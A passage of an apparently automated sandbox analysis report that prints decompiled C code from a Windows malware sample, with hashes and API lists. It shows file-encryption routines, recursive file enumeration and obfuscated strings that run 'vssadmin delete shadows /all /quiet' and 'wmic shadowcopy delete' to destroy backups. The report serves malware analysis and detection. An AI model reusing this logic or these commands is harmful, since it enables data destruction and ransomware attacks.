Instruction ID: 1599c5dc599c77c2f50f7025807eb1bc4c5c8c6536f040296bb1e9d9b3eb5869
Opcode Fuzzy Hash: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
Instruction Fuzzy Hash: 67418F31601216BBDB10BB60DD48FAA7BACFF04711F505076E902F6241EB78AA17DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F588400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0F588400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x0f588410
0x0f588412
0x0f588417
0x0f58841d
0x0f588420
0x0f588428
0x0f5884f2
0x0f5884fa
0x0f58842e
0x0f58842e
0x0f588430
0x0f588430
0x0f588433
0x0f588437
0x0f588438
0x0f588444
0x0f58844e
0x0f588452
0x0f588500
0x0f58850e
0x0f58851c
0x0f588461
0x0f588464
0x0f58846c
0x0f588473
0x0f58847a
0x0f588480
0x0f588484
0x0f58848b
0x0f588492
0x0f588499
0x0f58849d
0x0f5884a5
0x0f5884b5
0x0f5884b5
0x0f5884ba
0x0f5884c2
0x0f5884cd
0x0f5884d6
0x0f5884d6
0x0f5884a7
0x0f5884a7
0x0f5884ab
0x0f5884b3
0x00000000
0x00000000
0x0f5884b3
0x0f5884de
0x0f5884ec
0x00000000
0x0f5884ec
0x0f588452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F588420
VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F588448
GetModuleHandleA.KERNEL32(?), ref: 0F58849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F588500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F583875), ref: 0F58850E

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F5884B5, 0F5884B8
Advapi32.dll, xrefs: 0F5884A7, 0F5884AA

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
Instruction ID: c06f77bf9ffcd752874f0cfdc17745f53fecf6620f1a6133f364a53d8b8a4480
Opcode Fuzzy Hash: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
Instruction Fuzzy Hash: EE31E431A00208FFDB109FA5DD49BEEBF78FB04712F504069E601F2290D7789A169B65

Uniqueness

Uniqueness Score: -1.00%

Function 0F586660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F586660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf592a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F5836C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf592a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f58666b
0x0f586671
0x0f586678
0x0f58668d
0x0f586691
0x0f586699
0x0f5866d1
0x0f5866d1
0x0f5866f4
0x0f5866f6
0x0f5866ff
0x0f58670d
0x0f586713
0x0f586719
0x0f586727
0x0f586735
0x0f58673b
0x0f586744
0x0f58674b
0x0f586750
0x0f586750
0x0f58674b
0x0f58675b
0x0f586766
0x00000000
0x0f58676c
0x0f58669b
0x0f5866a6
0x00000000
0x0f5866ca
0x0f5866b7
0x0f5866bf
0x00000000
0x0f5866c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000,00000000,?,00000800), ref: 0F58666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F5838F4,00000000,00000000,00000000), ref: 0F586691
GetLastError.KERNEL32(?,0F5838F4,00000000,00000000,00000000), ref: 0F58669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F5838F4,00000000,00000000,00000000), ref: 0F5866B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F5838F4,00000000,00000000), ref: 0F5866EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0F5838F4,0000000A,00000000,?,0F5838F4,00000000), ref: 0F58670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F5838F4,?,0F5838F4,00000000), ref: 0F586735
GetLastError.KERNEL32(?,0F5838F4,00000000), ref: 0F58673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F5838F4,00000000,00000000), ref: 0F58675B
LeaveCriticalSection.KERNEL32(0F592A48,?,0F5838F4,00000000,00000000), ref: 0F586766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F586686, 0F5866AC

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 2cef97383705ab7d79c4decc481899ad1412c6660178387924bc088b218a912b
Instruction ID: 8350dbd7eba1acb3fecb0e3823380b5ea66e2a3af09cd8d097ed905cfc74cae6
Opcode Fuzzy Hash: 2cef97383705ab7d79c4decc481899ad1412c6660178387924bc088b218a912b
Instruction Fuzzy Hash: 63316375A40305FBDB10EFA0DD45FAE7BB4BB48701F104558F601BA280D7B9AA059FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F586DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F586DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F586BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0F586D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0F586AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F586DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0f586dfc
0x0f586dff
0x0f586e01
0x0f586e08
0x0f586f36
0x0f586f36
0x0f586f3c
0x0f586e1d
0x0f586e1d
0x0f586e35
0x0f586e38
0x0f586e3b
0x0f586e45
0x0f586e4b
0x0f586e4d
0x0f586e50
0x0f586e56
0x0f586e64
0x0f586e70
0x0f586e7c
0x0f586e82
0x0f586e84
0x0f586e96
0x0f586e9c
0x0f586e9e
0x0f586ea8
0x0f586eaa
0x0f586eb1
0x0f586ee2
0x0f586ee5
0x0f586eea
0x0f586eed
0x0f586eef
0x0f586ef2
0x0f586ef5
0x0f586ef7
0x0f586f00
0x0f586f00
0x0f586f03
0x0f586f03
0x0f586ef9
0x0f586efc
0x0f586efe
0x00000000
0x00000000
0x0f586efe
0x0f586ef7
0x0f586eb3
0x0f586ec7
0x0f586ecc
0x0f586ecc
0x0f586f0e
0x0f586f0e
0x0f586f10
0x0f586f10
0x0f586e9e
0x0f586f1d
0x0f586f23
0x0f586f23
0x0f586f2e
0x00000000
0x0f586e58
0x0f586e63
0x0f586e63
0x0f586e56

APIs

Part of subcall function 0F586780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8

Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
Part of subcall function 0F586BA0: lstrcatW.KERNEL32 ref: 0F586BC4
Part of subcall function 0F586BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
Part of subcall function 0F586BA0: lstrcatW.KERNEL32 ref: 0F586C24
Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
Part of subcall function 0F586BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
Part of subcall function 0F586BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
Part of subcall function 0F586BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
Part of subcall function 0F586BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF

Part of subcall function 0F586D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F586E22,00000000,?,?), ref: 0F586D55
Part of subcall function 0F586D40: wsprintfW.USER32 ref: 0F586D63
Part of subcall function 0F586D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F586D7F
Part of subcall function 0F586D40: GetLastError.KERNEL32(?,?), ref: 0F586D8C
Part of subcall function 0F586D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
lstrcatW.KERNEL32 ref: 0F586E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
lstrcatW.KERNEL32 ref: 0F586EA8
lstrcatW.KERNEL32 ref: 0F586EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
Instruction ID: 1921ea6ff382926096f9548d92552ca3f3b3b1a08fc4c7adfd421c56c616a185
Opcode Fuzzy Hash: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
Instruction Fuzzy Hash: 52319E31A00219EBCF11BF64DD849AEBBB8FF44311F0441A6E805F6202DB34AE16DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F5834F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F5834F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0f5834fa
0x0f5834ff
0x0f583502
0x0f583504
0x0f583519
0x0f58351e
0x0f583522
0x0f58353d
0x0f58354c
0x0f58354e
0x0f58355f
0x0f583561
0x0f583566
0x0f58356b
0x0f58356d
0x0f583570
0x0f583570
0x0f583571
0x0f583570
0x0f583584
0x0f583587
0x0f583589
0x0f583597
0x0f58359c
0x0f58359c
0x0f5835a9
0x0f5835a9
0x0f5835b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F583673,00000000), ref: 0F583504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F583673,00000000), ref: 0F58351C
CryptStringToBinaryA.CRYPT32(0F583673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F583535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F58354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F583561
wsprintfW.USER32 ref: 0F583587
wsprintfW.USER32 ref: 0F583597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F583673,00000000), ref: 0F5835A9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
Instruction ID: a83d69dc5258653c6a042d178f46c16b156452a6d42c6daa0fb1e0cc63240257
Opcode Fuzzy Hash: 1c3e15ce2155035e1a844b310ab77a685595f73c5932aacd8e80f45a61b14a9e
Instruction Fuzzy Hash: D821A571A413197FEB11AB64CC81F9ABFECEF49B50F100065F644F7281D7B56A128B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5845B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F5845B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F583CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0f5845c6
0x0f584662
0x0f58466c
0x0f584674
0x0f58467c
0x0f584680
0x0f584688
0x0f58468c
0x0f584694
0x0f584699
0x0f5846a1
0x0f5846a9
0x0f5846b1
0x0f5846b9
0x0f5846c1
0x0f5846c9
0x0f5846d4
0x0f5846df
0x0f5846ea
0x0f5846f5
0x0f584700
0x0f58470b
0x0f584716
0x0f584721
0x0f58472c
0x0f584737
0x0f584742
0x0f58474d
0x0f5845cc
0x0f5845ce
0x0f5845d6
0x0f5845de
0x0f5845e2
0x0f5845ea
0x0f5845ee
0x0f5845f6
0x0f5845fe
0x0f584606
0x0f58460e
0x0f584613
0x0f58461b
0x0f584623
0x0f58462b
0x0f584633
0x0f58463b
0x0f584643
0x0f58464b
0x0f584653
0x0f584653
0x0f584766
0x0f584775
0x0f584779
0x0f584785
0x0f58478d
0x0f5847a3
0x0f5847ab
0x0f5847ad
0x0f58477b
0x0f58477b
0x0f58477b
0x0f5847b7
0x0f5847c5

APIs

Part of subcall function 0F583CF0: _memset.LIBCMT ref: 0F583D42
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 0F583D66
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6A
Part of subcall function 0F583CF0: VerSetConditionMask.KERNEL32(00000000), ref: 0F583D6E
Part of subcall function 0F583CF0: VerifyVersionInfoW.KERNEL32 ref: 0F583D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F58476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F584785
lstrcatW.KERNEL32 ref: 0F58478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F5847A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5847B7

Strings

p, xrefs: 0F584633
a, xrefs: 0F584721
h, xrefs: 0F5846F5
., xrefs: 0F5845FE
l, xrefs: 0F58472C
a, xrefs: 0F5846B1
o, xrefs: 0F584623
m, xrefs: 0F5845E2
e, xrefs: 0F58464B
e, xrefs: 0F584643
x, xrefs: 0F58468C
, xrefs: 0F584716
, xrefs: 0F5846EA
open, xrefs: 0F58479C
, xrefs: 0F5846A1
, xrefs: 0F58463B
x, xrefs: 0F584606
i, xrefs: 0F5845F6
a, xrefs: 0F58461B
c, xrefs: 0F58462B
n, xrefs: 0F5846C1
e, xrefs: 0F58474D
., xrefs: 0F584680
u, xrefs: 0F584742
s, xrefs: 0F5846A9
m, xrefs: 0F5846B9
l, xrefs: 0F5846D4
m, xrefs: 0F58466C
s, xrefs: 0F584613
w, xrefs: 0F5845EE
/, xrefs: 0F584699
w, xrefs: 0F58470B
t, xrefs: 0F5846DF
b, xrefs: 0F5845D6
/, xrefs: 0F584737
\, xrefs: 0F584662
d, xrefs: 0F584700
d, xrefs: 0F5846C9
e, xrefs: 0F584653
\, xrefs: 0F5845CE

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
Instruction ID: fb37b0ca9acd9cf7a391135b8aef121d0ef4e56d2813acd1580c48b63c9d3d27
Opcode Fuzzy Hash: 2721502352ce87719c533d23392500906fc6ebd20e50e51f0bcadfb3ff19e96e
Instruction Fuzzy Hash: 294148B0108380DFE320DF218948B5BBFE2BB85B49F10491DEA985A291C7F6854DCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F583DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F583DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
